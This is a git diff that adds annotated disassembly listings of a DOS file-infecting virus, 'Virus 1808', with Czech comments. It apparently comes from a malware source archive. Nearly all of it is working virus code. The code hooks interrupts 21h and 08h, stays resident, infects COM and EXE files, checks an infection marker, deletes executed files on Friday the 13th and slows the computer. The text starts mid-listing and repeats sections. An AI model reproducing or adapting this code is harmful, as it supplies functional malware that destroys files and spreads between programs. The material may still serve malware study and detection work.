CMP AH,E0 +45BD:025F 7505 JNZ 0266 +45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti. +45BD:0264 9D POPF ; +45BD:0265 CF IRET ;========================== +45BD:0266 80FCDD CMP AH,DD ; +45BD:0269 7413 JZ 027E +45BD:026B 80FCDE CMP AH,DE +45BD:026E 7428 JZ 0298 +45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE. +45BD:0273 7503 JNZ 0278 +45BD:0275 E9B400 JMP 032C +45BD:0278 9D POPF +45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha. + ;============================================== +45BD:027E 58 POP AX ; Obsluha kodu 0DDH. +45BD:027F 58 POP AX +45BD:0280 B80001 MOV AX,0100 +45BD:0283 2EA30A00 MOV CS:[000A],AX +45BD:0287 58 POP AX +45BD:0288 2EA30C00 MOV CS:[000C],AX +45BD:028C F3 REPZ +45BD:028D A4 MOVSB +45BD:028E 9D POPF +45BD:028F 2EA10F00 MOV AX,CS:[000F] +45BD:0293 2EFF2E0A00 JMP FAR CS:[000A] + ;============================================== +45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH. +45BD:029B 9D POPF +45BD:029C 8CC8 MOV AX,CS +45BD:029E 8ED0 MOV SS,AX +45BD:02A0 BC1007 MOV SP,0710 +45BD:02A3 06 PUSH ES +45BD:02A4 06 PUSH ES +45BD:02A5 33FF XOR DI,DI +45BD:02A7 0E PUSH CS +45BD:02A8 07 POP ES +45BD:02A9 B91000 MOV CX,0010 +45BD:02AC 8BF3 MOV SI,BX +45BD:02AE BF2100 MOV DI,0021 +45BD:02B1 F3 REPZ +45BD:02B2 A4 MOVSB +45BD:02B3 8CD8 MOV AX,DS +45BD:02B5 8EC0 MOV ES,AX +45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A] +45BD:02BC 2E03062B00 ADD AX,CS:[002B] +45BD:02C1 83D200 ADC DX,+00 +45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A] +45BD:02C9 8ED8 MOV DS,AX +45BD:02CB 8BF2 MOV SI,DX +45BD:02CD 8BFA MOV DI,DX +45BD:02CF 8CC5 MOV BP,ES +45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F] +45BD:02D6 0BDB OR BX,BX +45BD:02D8 7413 JZ 02ED +45BD:02DA B90080 MOV CX,8000 +45BD:02DD F3 REPZ +45BD:02DE A5 MOVSW +45BD:02DF 050010 ADD AX,1000 +45BD:02E2 81C50010 ADD BP,1000 +45BD:02E6 8ED8 MOV DS,AX +45BD:02E8 8EC5 MOV ES,BP +45BD:02EA 4B DEC BX +45BD:02EB 75ED JNZ 02DA +45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D] +45BD:02F2 F3 REPZ +45BD:02F3 A4 MOVSB +45BD:02F4 58 POP AX +45BD:02F5 50 PUSH AX +45BD:02F6 051000 ADD AX,0010 +45BD:02F9 2E01062900 ADD CS:[0029],AX +45BD:02FE 2E01062500 ADD CS:[0025],AX +45BD:0303 2EA12100 MOV AX,CS:[0021] +45BD:0307 1F POP DS +45BD:0308 07 POP ES +45BD:0309 2E8E162900 MOV SS,CS:[0029] +45BD:030E 2E8B262700 MOV SP,CS:[0027] +45BD:0313 2EFF2E2300 JMP FAR CS:[0023] + ;============================================== +45BD:0318 33C9 XOR CX,CX ; Vymazani souboru. +45BD:031A B80143 MOV AX,4301 ; Zmen atributy souboru. +45BD:031D CD21 INT 21 ; +45BD:031F B441 MOV AH,41 ; Vymaz +45BD:0321 CD21 INT 21 +45BD:0323 B8004B MOV AX,4B00 ; a vykonej. +45BD:0326 9D POPF +45BD:0327 2EFF2E1700 JMP FAR CS:[0017] ; FUNGUJE v patek 13. + ;============================================== +45BD:032C 2E803E0E0001 CMP Byte Ptr CS:[000E],01 ; LOAD & EXECUTE. +45BD:0332 74E4 JZ 0318 +45BD:0334 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF +45BD:033B 2EC7068F000000 MOV Word Ptr CS:[008F],0000 +45BD:0342 2E89168000 MOV CS:[0080],DX +45BD:0347 2E8C1E8200 MOV CS:[0082],DS +45BD:034C 50 PUSH AX +45BD:034D 53 PUSH BX +45BD:034E 51 PUSH CX +45BD:034F 52 PUSH DX +45BD:0350 56 PUSH SI +45BD:0351 57 PUSH DI +45BD:0352 1E PUSH DS +45BD:0353 06 PUSH ES +45BD:0354 FC CLD +45BD:0355 8BFA MOV DI,DX +45BD:0357 32D2 XOR DL,DL +45BD:0359 807D013A CMP Byte Ptr [DI+01],3A +45BD:035D 7505 JNZ 0364 ; +45BD:035F 8A15 MOV DL,[DI] ; Volny prostor na disku. +45BD:0361 80E21F AND DL,1F +45BD:0364 B436 MOV AH,36 +45BD:0366 CD21 INT 21 +45BD:0368 3DFFFF CMP AX,FFFF +45BD:036B 7503 JNZ 0370 +45BD:036D E97702 JMP 05E7 ;========================== +45BD:0370 F7E3 MUL BX ; Vypocet volneho prostoru. +45BD:0372 F7E1 MUL CX +45BD:0374 0BD2 OR DX,DX +45BD:0376 7505 JNZ 037D +45BD:0378 3D1007 CMP AX,0710 ; Je dost mista na VIRUS? +45BD:037B 72F0 JB 036D +45BD:037D 2E8B168000 MOV DX,CS:[0080] +45BD:0382 1E PUSH DS +45BD:0383 07 POP ES +45BD:0384 32C0 XOR AL,AL +45BD:0386 B94100 MOV CX,0041 +45BD:0389 F2 REPNZ ; Hledani konce retezce. +45BD:038A AE SCASB +45BD:038B 2E8B368000 MOV SI,CS:[0080] +45BD:0390 8A04 MOV AL,[SI] +45BD:0392 0AC0 OR AL,AL +45BD:0394 740E JZ 03A4 +45BD:0396 3C61 CMP AL,61 +45BD:0398 7207 JB 03A1 +45BD:039A 3C7A CMP AL,7A +45BD:039C 7703 JA 03A1 +45BD:039E 802C20 SUB Byte Ptr [SI],20 +45BD:03A1 46 INC SI +45BD:03A2 EBEC JMP 0390 +45BD:03A4 B90B00 MOV CX,000B +45BD:03A7 2BF1 SUB SI,CX +45BD:03A9 BF8400 MOV DI,0084 +45BD:03AC 0E PUSH CS +45BD:03AD 07 POP ES +45BD:03AE B90B00 MOV CX,000B +45BD:03B1 F3 REPZ ; VIRUS neinfikuje +45BD:03B2 A6 CMPSB ; COMMAND.COM +45E3:03B3 7503 JNZ 03B8 +45E3:03B5 E92F02 JMP 05E7 +45E3:03B8 B80043 MOV AX,4300 ; Zjisti atributy +45E3:03BB CD21 INT 21 ; souboru. +45E3:03BD 7205 JB 03C4 +45E3:03BF 2E890E7200 MOV CS:[0072],CX +45E3:03C4 7225 JB 03EB +45E3:03C6 32C0 XOR AL,AL +45E3:03C8 2EA24E00 MOV CS:[004E],AL +45E3:03CC 1E PUSH DS +45E3:03CD 07 POP ES +45E3:03CE 8BFA MOV DI,DX +45E3:03D0 B94100 MOV CX,0041 +45E3:03D3 F2 REPNZ +45E3:03D4 AE SCASB +45E3:03D5 807DFE4D CMP Byte Ptr [DI-02],4D ; Rozeznani COM +45E3:03D9 740B JZ 03E6 ; a EXE souboru. +45E3:03DB 807DFE6D CMP Byte Ptr [DI-02],6D +45E3:03DF 7405 JZ 03E6 +45E3:03E1 2EFE064E00 INC Byte Ptr CS:[004E] +45E3:03E6 B8003D MOV AX,3D00 ; Otevri soubor. +45E3:03E9 CD21 INT 21 +45E3:03EB 725A JB 0447 +45E3:03ED 2EA37000 MOV CS:[0070],AX +45E3:03F1 8BD8 MOV BX,AX +45E3:03F3 B80242 MOV AX,4202 ; Posun R/W pointer. +45E3:03F6 B9FFFF MOV CX,FFFF ; 5 byte od konce +45E3:03F9 BAFBFF MOV DX,FFFB ; souboru. +45E3:03FC CD21 INT 21 ;===================== +45E3:03FE 72EB JB 03EB +45E3:0400 050500 ADD AX,0005 +45E3:0403 2EA31100 MOV CS:[0011],AX +45E3:0407 B90500 MOV CX,0005 +45E3:040A BA6B00 MOV DX,006B ; Cti ze souboru +45E3:040D 8CC8 MOV AX,CS ; 5 byte (CS:6B) +45E3:040F 8ED8 MOV DS,AX +45E3:0411 8EC0 MOV ES,AX +45E3:0413 B43F MOV AH,3F +45E3:0415 CD21 INT 21 +45E3:0417 8BFA MOV DI,DX +45E3:0419 BE0500 MOV SI,0005 ; Rozpoznavaci kod je +45E3:041C F3 REPZ ; MsDos. +45E3:041D A6 CMPSB +45E3:041E 7507 JNZ 0427 +45E3:0420 B43E MOV AH,3E ; Soubor je nakazen. +45E3:0422 CD21 INT 21 +45E3:0424 E9C001 JMP 05E7 +45E3:0427 B82435 MOV AX,3524 +45E3:042A CD21 INT 21 +45E3:042C 891E1B00 MOV [001B],BX +45E3:0430 8C061D00 MOV [001D],ES +45E3:0434 BA1B02 MOV DX,021B +45E3:0437 B82425 MOV AX,2524 +45E3:043A CD21 INT 21 +45E3:043C C5168000 LDS DX,[0080] +45E3:0440 33C9 XOR CX,CX +45E3:0442 B80143 MOV AX,4301 +45E3:0445 CD21 INT 21 +45E3:0447 723B JB 0484 +45E3:0449 2E8B1E7000 MOV BX,CS:[0070] +45E3:044E B43E MOV AH,3E +45E3:0450 CD21 INT 21 +45E3:0452 2EC7067000FFFF MOV Word Ptr CS:[0070],FFFF +45E3:0459 B8023D MOV AX,3D02 +45E3:045C CD21 INT 21 +45E3:045E 7224 JB 0484 +45E3:0460 2EA37000 MOV CS:[0070],AX +45E3:0464 8CC8 MOV AX,CS +45E3:0466 8ED8 MOV DS,AX +45E3:0468 8EC0 MOV ES,AX +45E3:046A 8B1E7000 MOV BX,[0070] +45E3:046E B80057 MOV AX,5700 +45E3:0471 CD21 INT 21 +45E3:0473 89167400 MOV [0074],DX +45E3:0477 890E7600 MOV [0076],CX +45E3:047B B80042 MOV AX,4200 +45E3:047E 33C9 XOR CX,CX +45E3:0480 8BD1 MOV DX,CX +45E3:0482 CD21 INT 21 +45E3:0484 723D JB 04C3 +45E3:0486 803E4E0000 CMP Byte Ptr [004E],00 +45E3:048B 7403 JZ 0490 +45E3:048D EB57 JMP 04E6 +45E3:048F 90 NOP +45E3:0490 BB0010 MOV BX,1000 +45E3:0493 B448 MOV AH,48 +45E3:0495 CD21 INT 21 +45E3:0497 730B JNB 04A4 +45E3:0499 B43E MOV AH,3E +45E3:049B 8B1E7000 MOV BX,[0070] +45E3:049F CD21 INT 21 +45E3:04A1 E94301 JMP 05E7 +45E3:04A4 FF068F00 INC Word Ptr [008F] +45E3:04A8 8EC0 MOV ES,AX +45E3:04AA 33F6 XOR SI,SI +45E3:04AC 8BFE MOV DI,SI +45E3:04AE B91007 MOV CX,0710 +45E3:04B1 F3 REPZ +45E3:04B2 A4 MOVSB +45E3:04B3 8BD7 MOV DX,DI +45E3:04B5 8B0E1100 MOV CX,[0011] +45E3:04B9 8B1E7000 MOV BX,[0070] +45E3:04BD 06 PUSH ES +45E3:04BE 1F POP DS +45E3:04BF B43F MOV AH,3F +45E3:04C1 CD21 INT 21 +45E3:04C3 721C JB 04E1 +45E3:04C5 03F9 ADD DI,CX +45E3:04C7 33C9 XOR CX,CX +45E3:04C9 8BD1 MOV DX,CX +45E3:04CB B80042 MOV AX,4200 +45E3:04CE CD21 INT 21 +45E3:04D0 BE0500 MOV SI,0005 +45E3:04D3 B90500 MOV CX,0005 +45E3:04D6 F3 REPZ +45E3:04D7 2EA4 MOVSB CS: +45E3:04D9 8BCF MOV CX,DI +45E3:04DB 33D2 XOR DX,DX +45E3:04DD B440 MOV AH,40 +45E3:04DF CD21 INT 21 +45E3:04E1 720D JB 04F0 +45E3:04E3 E9BC00 JMP 05A2 +45E3:04E6 B91C00 MOV CX,001C +45E3:04E9 BA4F00 MOV DX,004F +45E3:04EC B43F MOV AH,3F +45E3:04EE CD21 INT 21 +45E3:04F0 724A JB 053C +45E3:04F2 C70661008419 MOV Word Ptr [0061],1984 +45E3:04F8 A15D00 MOV AX,[005D] +45E3:04FB A34500 MOV [0045],AX +45E3:04FE A15F00 MOV AX,[005F] +45E3:0501 A34300 MOV [0043],AX +45E3:0504 A16300 MOV AX,[0063] +45E3:0507 A34700 MOV [0047],AX +45E3:050A A16500 MOV AX,[0065] +45E3:050D A34900 MOV [0049],AX +45E3:0510 A15300 MOV AX,[0053] +45E3:0513 833E510000 CMP Word Ptr [0051],+00 +45E3:0518 7401 JZ 051B +45E3:051A 48 DEC AX +45E3:051B F7267800 MUL Word Ptr [0078] +45E3:051F 03065100 ADD AX,[0051] +45E3:0523 83D200 ADC DX,+00 +45E3:0526 050F00 ADD AX,000F +45E3:0529 83D200 ADC DX,+00 +45E3:052C 25F0FF AND AX,FFF0 +45E3:052F A37C00 MOV [007C],AX +45E3:0532 89167E00 MOV [007E],DX +45E3:0536 051007 ADD AX,0710 +45E3:0539 83D200 ADC DX,+00 +45E3:053C 723A JB 0578 +45E3:053E F7367800 DIV Word Ptr [0078] +45E3:0542 0BD2 OR DX,DX +45E3:0544 7401 JZ 0547 +45E3:0546 40 INC AX +45E3:0547 A35300 MOV [0053],AX +45E3:054A 89165100 MOV [0051],DX +45E3:054E A17C00 MOV AX,[007C] +45E3:0551 8B167E00 MOV DX,[007E] +45E3:0555 F7367A00 DIV Word Ptr [007A] +45E3:0559 2B065700 SUB AX,[0057] +45E3:055D A36500 MOV [0065],AX +45E3:0560 C7066300C500 MOV Word Ptr [0063],00C5 +45E3:0566 A35D00 MOV [005D],AX +45E3:0569 C7065F001007 MOV Word Ptr [005F],0710 +45E3:056F 33C9 XOR CX,CX +45E3:0571 8BD1 MOV DX,CX +45E3:0573 B80042 MOV AX,4200 +45E3:0576 CD21 INT 21 +45E3:0578 720A JB 0584 +45E3:057A B91C00 MOV CX,001C +45E3:057D BA4F00 MOV DX,004F +45E3:0580 B440 MOV AH,40 +45E3:0582 CD21 INT 21 +45E3:0584 7211 JB 0597 +45E3:0586 3BC1 CMP AX,CX +45E3:0588 7518 JNZ 05A2 +45E3:058A 8B167C00 MOV DX,[007C] +45E3:058E 8B0E7E00 MOV CX,[007E] +45E3:0592 B80042 MOV AX,4200 +45E3:0595 CD21 INT 21 +45E3:0597 7209 JB 05A2 +45E3:0599 33D2 XOR DX,DX +45E3:059B B91007 MOV CX,0710 +45E3:059E B440 MOV AH,40 +45E3:05A0 CD21 INT 21 +45E3:05A2 2E833E8F0000 CMP Word Ptr CS:[008F],+00 +45E3:05A8 7404 JZ 05AE +45E3:05AA B449 MOV AH,49 +45E3:05AC CD21 INT 21 +45E3:05AE 2E833E7000FF CMP Word Ptr CS:[0070],-01 +45E3:05B4 7431 JZ 05E7 +45E3:05B6 2E8B1E7000 MOV BX,CS:[0070] +45E3:05BB 2E8B167400 MOV DX,CS:[0074] +45E3:05C0 2E8B0E7600 MOV CX,CS:[0076] +45E3:05C5 B80157 MOV AX,5701 +45E3:05C8 CD21 INT 21 +45E3:05CA B43E MOV AH,3E +45E3:05CC CD21 INT 21 +45E3:05CE 2EC5168000 LDS DX,CS:[0080] +45E3:05D3 2E8B0E7200 MOV CX,CS:[0072] +45E3:05D8 B80143 MOV AX,4301 +45E3:05DB CD21 INT 21 +45E3:05DD 2EC5161B00 LDS DX,CS:[001B] +45E3:05E2 B82425 MOV AX,2524 +45E3:05E5 CD21 INT 21 +45E3:05E7 07 POP ES +45E3:05E8 1F POP DS +45E3:05E9 5F POP DI +45E3:05EA 5E POP SI +45E3:05EB 5A POP DX +45E3:05EC 59 POP CX +45E3:05ED 5B POP BX +45E3:05EE 58 POP AX +45E3:05EF 9D POPF +45E3:05F0 2EFF2E1700 JMP FAR CS:[0017] +45E3:05F0 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0600 F2 13 50 43 54 4F 4F 4C-53 2E 45 58 45 00 22 2F r.PCTOOLS.EXE."/ +45E3:0610 01 FE 0D 00 8B 00 F0 F0-83 F2 F4 03 00 0F 00 00 .~....pp.rt..... +45E3:0620 4D FE 0D 04 00 45 43 3D-43 3A 5C 43 4F 4D 4D 41 M~...EC=C:\COMMA +45E3:0630 00 47 02 00 00 32 00 FF-FF FF FF FF FF FF FF FF .G...2.......... +45E3:0640 FF FF FF FF FF FF FF FF-FF 43 3A 5C 5A 53 53 52 .........C:\ZSSR +45E3:0650 5C 4B 41 4C 49 42 52 5C-4B 41 49 4B 49 2E 42 41 \KALIBR\KAIKI.BA +45E3:0660 54 00 6B 61 69 6B 69 0D-00 FF FF FF 00 00 00 00 T.kaiki......... +45E3:0670 4D FE 0D 00 10 M~... +45E3:0670 00 00 00-00 00 00 00 00 00 00 00 ........... +45E3:0680 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 i..sUMsDos \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.j_1808.lst b/MSDOS/Virus.MSDOS.Unknown.j_1808.lst new file mode 100644 index 00000000..38366950 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_1808.lst @@ -0,0 +1,583 @@ +;======================================================================= +; VIRUS 1808 +; Virus se napojuje na preruseni 08 (hodiny) a zpomaluje chod pocitace. +; +; +; +45AD:0100 E99200 JMP 0195 +0100 E9 92 00 73 55 4D 73 44-6F 73 00 01 77 14 00 00 i..sUMsDos..w... +0110 00 00 01 2C 02 70 00 1C-02 BC 0F EB 04 FE 0D C6 ...,.p...<.k.~.F +0120 5D 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ]............... +0130 00 F2 13 80 00 00 00 80-00 F2 13 5C 00 F2 13 6C .r.......r.\.r.l +0140 00 F2 13 10 07 82 2A C5-00 82 2A 00 F0 06 00 4D .r....*E..*.p..M +0150 5A 40 00 5D 01 00 00 20-00 2F 02 FF FF F3 2A 10 Z@.]... ./...s*. +0160 07 84 19 C5 00 F3 2A 1E-00 00 00 00 00 00 00 00 ...E.s*......... +0170 05 00 20 00 94 09 B0 B1-00 02 10 00 30 B1 02 00 .. ...01....01.. + +45AD:0195 FC CLD +45AD:0196 B4E0 MOV AH,E0 ;================================ +45AD:0198 CD21 INT 21 ; Test pritomnosti v pamati. +45AD:019A 80FCE0 CMP AH,E0 ; +45AD:019D 7316 JNB 01B5 +45AD:019F 80FC03 CMP AH,03 +45AD:01A2 7211 JB 01B5 +45AD:01A4 B4DD MOV AH,DD +45AD:01A6 BF0001 MOV DI,0100 +45AD:01A9 BE1007 MOV SI,0710 +45AD:01AC 03F7 ADD SI,DI +45AD:01AE 2E8B8D1100 MOV CX,CS:[DI+0011] +45AD:01B3 CD21 INT 21 +45AD:01B5 8CC8 MOV AX,CS +45AD:01B7 051000 ADD AX,0010 +45AD:01BA 8ED0 MOV SS,AX +45AD:01BC BC0007 MOV SP,0700 +45AD:01BF 50 PUSH AX +45AD:01C0 B8C500 MOV AX,00C5 +45AD:01C3 50 PUSH AX +45AD:01C4 CB RETF ; Jdeme na nasledujici radek. +;========================================================================= +45BD:00C5 FC CLD ; +45BD:00C6 06 PUSH ES +45BD:00C7 2E8C063100 MOV CS:[0031],ES +45BD:00CC 2E8C063900 MOV CS:[0039],ES +45BD:00D1 2E8C063D00 MOV CS:[003D],ES +45BD:00D6 2E8C064100 MOV CS:[0041],ES +45BD:00DB 8CC0 MOV AX,ES +45BD:00DD 051000 ADD AX,0010 +45BD:00E0 2E01064900 ADD CS:[0049],AX +45BD:00E5 2E01064500 ADD CS:[0045],AX +45BD:00EA B4E0 MOV AH,E0 ;========================= +45BD:00EC CD21 INT 21 ; +45BD:00EE 80FCE0 CMP AH,E0 ; +45BD:00F1 7313 JNB 0106 ;========================= +45BD:00F3 80FC03 CMP AH,03 ; VIRUS JE INSTALOVAN. +45BD:00F6 07 POP ES +45BD:00F7 2E8E164500 MOV SS,CS:[0045] +45BD:00FC 2E8B264300 MOV SP,CS:[0043] +45BD:0101 2EFF2E4700 JMP FAR CS:[0047] +45BD:0106 33C0 XOR AX,AX ;========================= +45BD:0108 8EC0 MOV ES,AX ; VIRUS NENI INSTALOVAN. +45BD:010A 26A1FC03 MOV AX,ES:[03FC] ; Prerusovaci vektor 255. +45BD:010E 2EA34B00 MOV CS:[004B],AX ; Je definovan kod +45BD:0112 26A0FE03 MOV AL,ES:[03FE] ; 0000:03FC F3 REPZ +45BD:0116 2EA24D00 MOV CS:[004D],AL 0000:03FD A5 MOVSW +45BD:011A 26C706FC03F3A5 MOV Word Ptr ES:[03FC],A5F3 0000:03FE CB RETF +45BD:0121 26C606FE03CB MOV Byte Ptr ES:[03FE],CB +45BD:0127 58 POP AX +45BD:0128 051000 ADD AX,0010 +45BD:012B 8EC0 MOV ES,AX +45BD:012D 0E PUSH CS +45BD:012E 1F POP DS +45BD:012F B91007 MOV CX,0710 +45BD:0132 D1E9 SHR CX,1 +45BD:0134 33F6 XOR SI,SI +45BD:0136 8BFE MOV DI,SI +45BD:0138 06 PUSH ES +45BD:0139 B84201 MOV AX,0142 +45BD:013C 50 PUSH AX +45BD:013D EAFC030000 JMP 0000:03FC ;======================== +45BD:0142 8CC8 MOV AX,CS ; Po skoku pokracujeme +45BD:0144 8ED0 MOV SS,AX ; na 45BD:142 +45BD:0146 BC0007 MOV SP,0700 +45BD:0149 33C0 XOR AX,AX ;======================== +45BD:014B 8ED8 MOV DS,AX ; +45BD:014D 2EA14B00 MOV AX,CS:[004B] ; Obnoveni puvodni hodno- +45BD:0151 A3FC03 MOV [03FC],AX ; ty preruseni 255. +45BD:0154 2EA04D00 MOV AL,CS:[004D] +45BD:0158 A2FE03 MOV [03FE],AL +45BD:015B 8BDC MOV BX,SP ; Velikost programu v +45BD:015D B104 MOV CL,04 ; paragrafech. +45BD:015F D3EB SHR BX,CL +45BD:0161 83C310 ADD BX,+10 +45BD:0164 2E891E3300 MOV CS:[0033],BX ; Zmen velikost alokovane +45BD:0169 B44A MOV AH,4A ; pameti. +45BD:016B 2E8E063100 MOV ES,CS:[0031] ; +45BD:0170 CD21 INT 21 ;======================== +45BD:0172 B82135 MOV AX,3521 ; Cti preruseni 21H. +45BD:0175 CD21 INT 21 ; +45BD:0177 2E891E1700 MOV CS:[0017],BX ; +45BD:017C 2E8C061900 MOV CS:[0019],ES ;======================== +45BD:0181 0E PUSH CS +45BD:0182 1F POP DS +45BD:0183 BA5B02 MOV DX,025B ; Definice noveho vektoru +45BD:0186 B82125 MOV AX,2521 ; preruseni 21H. +45BD:0189 CD21 INT 21 ;======================== +45BD:018B 8E063100 MOV ES,[0031] +45BD:018F 268E062C00 MOV ES,ES:[002C] +45BD:0194 33FF XOR DI,DI +45BD:0196 B9FF7F MOV CX,7FFF +45BD:0199 32C0 XOR AL,AL +45BD:019B F2 REPNZ +45BD:019C AE SCASB +45BD:019D 263805 CMP ES:[DI],AL +45BD:01A0 E0F9 LOOPNZ 019B +45BD:01A2 8BD7 MOV DX,DI +45BD:01A4 83C203 ADD DX,+03 +45BD:01A7 B8004B MOV AX,4B00 +45BD:01AA 06 PUSH ES +45BD:01AB 1F POP DS +45BD:01AC 0E PUSH CS +45BD:01AD 07 POP ES +45BD:01AE BB3500 MOV BX,0035 +45BD:01B1 1E PUSH DS +45BD:01B2 06 PUSH ES +45BD:01B3 50 PUSH AX +45BD:01B4 53 PUSH BX +45BD:01B5 51 PUSH CX +45BD:01B6 52 PUSH DX +45BD:01B7 B42A MOV AH,2A ; DATUM +45BD:01B9 CD21 INT 21 ;====================== +45BD:01BB 2EC6060E0000 MOV Byte Ptr CS:[000E],00 +45BD:01C1 81F9C307 CMP CX,07C3 ; Virus se nemnozi roku +45BD:01C5 7430 JZ 01F7 ; 1987, v patek 13 maze +45BD:01C7 3C05 CMP AL,05 ; spustene soubory. +45BD:01C9 750D JNZ 01D8 +45BD:01CB 80FA0D CMP DL,0D +45BD:01CE 7508 JNZ 01D8 +45BD:01D0 2EFE060E00 INC Byte Ptr CS:[000E] +45BD:01D5 EB20 JMP 01F7 +45BD:01D7 90 NOP +45BD:01D8 B80835 MOV AX,3508 ;======================= +45BD:01DB CD21 INT 21 ; Redefinice preruseni +45BD:01DD 2E891E1300 MOV CS:[0013],BX ; 08. +45BD:01E2 2E8C061500 MOV CS:[0015],ES +45BD:01E7 0E PUSH CS +45BD:01E8 1F POP DS +45BD:01E9 C7061F00907E MOV Word Ptr [001F],7E90 +45BD:01EF B80825 MOV AX,2508 +45BD:01F2 BA1E02 MOV DX,021E ; +45BD:01F5 CD21 INT 21 ;======================= +45BD:01F7 5A POP DX +45BD:01F8 59 POP CX +45BD:01F9 5B POP BX +45BD:01FA 58 POP AX +45BD:01FB 07 POP ES +45BD:01FC 1F POP DS +45BD:01FD 9C PUSHF +45BD:01FE 2EFF1E1700 CALL FAR CS:[0017] ; LOAD AND EXECUTE. +45BD:0203 1E PUSH DS ; +45BD:0204 07 POP ES +45BD:0205 B449 MOV AH,49 +45BD:0207 CD21 INT 21 +45BD:0209 B44D MOV AH,4D +45BD:020B CD21 INT 21 +45BD:020D B431 MOV AH,31 +45BD:020F BA0006 MOV DX,0600 +45BD:0212 B104 MOV CL,04 +45BD:0214 D3EA SHR DX,CL +45BD:0216 83C210 ADD DX,+10 +45BD:0219 CD21 INT 21 +45BD:021B 32C0 XOR AL,AL +45BD:021D CF IRET +; +;======================================================================= +; OBSLUHA PRERUSENI 08. +; +45BD:021E 2E833E1F0002 CMP Word Ptr CS:[001F],+02 +45BD:0224 7517 JNZ 023D +45BD:0226 50 PUSH AX +45BD:0227 53 PUSH BX +45BD:0228 51 PUSH CX +45BD:0229 52 PUSH DX +45BD:022A 55 PUSH BP +45BD:022B B80206 MOV AX,0602 +45BD:022E B787 MOV BH,87 +45BD:0230 B90505 MOV CX,0505 +45BD:0233 BA1010 MOV DX,1010 +45BD:0236 CD10 INT 10 +45BD:0238 5D POP BP +45BD:0239 5A POP DX +45BD:023A 59 POP CX +45BD:023B 5B POP BX +45BD:023C 58 POP AX +45BD:023D 2EFF0E1F00 DEC Word Ptr CS:[001F] +45BD:0242 7512 JNZ 0256 +45BD:0244 2EC7061F000100 MOV Word Ptr CS:[001F],0001 +45BD:024B 50 PUSH AX +45BD:024C 51 PUSH CX +45BD:024D 56 PUSH SI +45BD:024E B90140 MOV CX,4001 +45BD:0251 F3 REPZ +45BD:0252 AC LODSB +45BD:0253 5E POP SI +45BD:0254 59 POP CX +45BD:0255 58 POP AX +45BD:0256 2EFF2E1300 JMP FAR CS:[0013] +; +;======================================================================= +; OBSLUHA PRERUSENI 21H. +; +45BD:025B 9C PUSHF +45BD:025C 80FCE0 CMP AH,E0 +45BD:025F 7505 JNZ 0266 +45BD:0261 B80003 MOV AX,0300 ; Test pritomnosti. +45BD:0264 9D POPF ; +45BD:0265 CF IRET ;========================== +45BD:0266 80FCDD CMP AH,DD ; +45BD:0269 7413 JZ 027E +45BD:026B 80FCDE CMP AH,DE +45BD:026E 7428 JZ 0298 +45BD:0270 3D004B CMP AX,4B00 ; LOAD AND EXECUTE. +45BD:0273 7503 JNZ 0278 +45BD:0275 E9B400 JMP 032C +45BD:0278 9D POPF +45BD:0279 2EFF2E1700 JMP FAR CS:[0017] ; Puvodni obsluha. + ;============================================== +45BD:027E 58 POP AX ; Obsluha kodu 0DDH. +45BD:027F 58 POP AX +45BD:0280 B80001 MOV AX,0100 +45BD:0283 2EA30A00 MOV CS:[000A],AX +45BD:0287 58 POP AX +45BD:0288 2EA30C00 MOV CS:[000C],AX +45BD:028C F3 REPZ +45BD:028D A4 MOVSB +45BD:028E 9D POPF +45BD:028F 2EA10F00 MOV AX,CS:[000F] +45BD:0293 2EFF2E0A00 JMP FAR CS:[000A] + ;============================================== +45BD:0298 83C406 ADD SP,+06 ; Obsluha kodu 0DEH. +45BD:029B 9D POPF +45BD:029C 8CC8 MOV AX,CS +45BD:029E 8ED0 MOV SS,AX +45BD:02A0 BC1007 MOV SP,0710 +45BD:02A3 06 PUSH ES +45BD:02A4 06 PUSH ES +45BD:02A5 33FF XOR DI,DI +45BD:02A7 0E PUSH CS +45BD:02A8 07 POP ES +45BD:02A9 B91000 MOV CX,0010 +45BD:02AC 8BF3 MOV SI,BX +45BD:02AE BF2100 MOV DI,0021 +45BD:02B1 F3 REPZ +45BD:02B2 A4 MOVSB +45BD:02B3 8CD8 MOV AX,DS +45BD:02B5 8EC0 MOV ES,AX +45BD:02B7 2EF7267A00 MUL Word Ptr CS:[007A] +45BD:02BC 2E03062B00 ADD AX,CS:[002B] +45BD:02C1 83D200 ADC DX,+00 +45BD:02C4 2EF7367A00 DIV Word Ptr CS:[007A] +45BD:02C9 8ED8 MOV DS,AX +45BD:02CB 8BF2 MOV SI,DX +45BD:02CD 8BFA MOV DI,DX +45BD:02CF 8CC5 MOV BP,ES +45BD:02D1 2E8B1E2F00 MOV BX,CS:[002F] +45BD:02D6 0BDB OR BX,BX +45BD:02D8 7413 JZ 02ED +45BD:02DA B90080 MOV CX,8000 +45BD:02DD F3 REPZ +45BD:02DE A5 MOVSW +45BD:02DF 050010 ADD AX,1000 +45BD:02E2 81C50010 ADD BP,1000 +45BD:02E6 8ED8 MOV DS,AX +45BD:02E8 8EC5 MOV ES,BP +45BD:02EA 4B DEC BX +45BD:02EB 75ED JNZ 02DA +45BD:02ED 2E8B0E2D00 MOV CX,CS:[002D] +45BD:02F2 F3 REPZ +45BD:02F3 A4 MOVSB +45BD:02F4 58 POP AX +45BD:02F5 50 PUSH AX +45BD:02F6 051000 ADD AX,0010 +45BD:02F9 2E01062900 ADD CS:[0029],AX +45BD:02FE 2E01062500 ADD CS:[0025],AX +45BD:0303 2EA12100 MOV AX,CS:[0021] +45BD:0307 1F POP DS +45BD:0308 07 POP ES +45BD:0309 2E8E162900 MOV SS,CS:[0029] +45BD:030E 2E8B262700 MOV SP,CS:[0027] +45BD:0313 2EFF2E2300 JMP FAR CS:[0023] + ;============================================== +45BD:0318 33C9 XOR CX,CX ; Vymazani souboru. +45BD:031A B80143 MOV AX,4301 ; Zmen 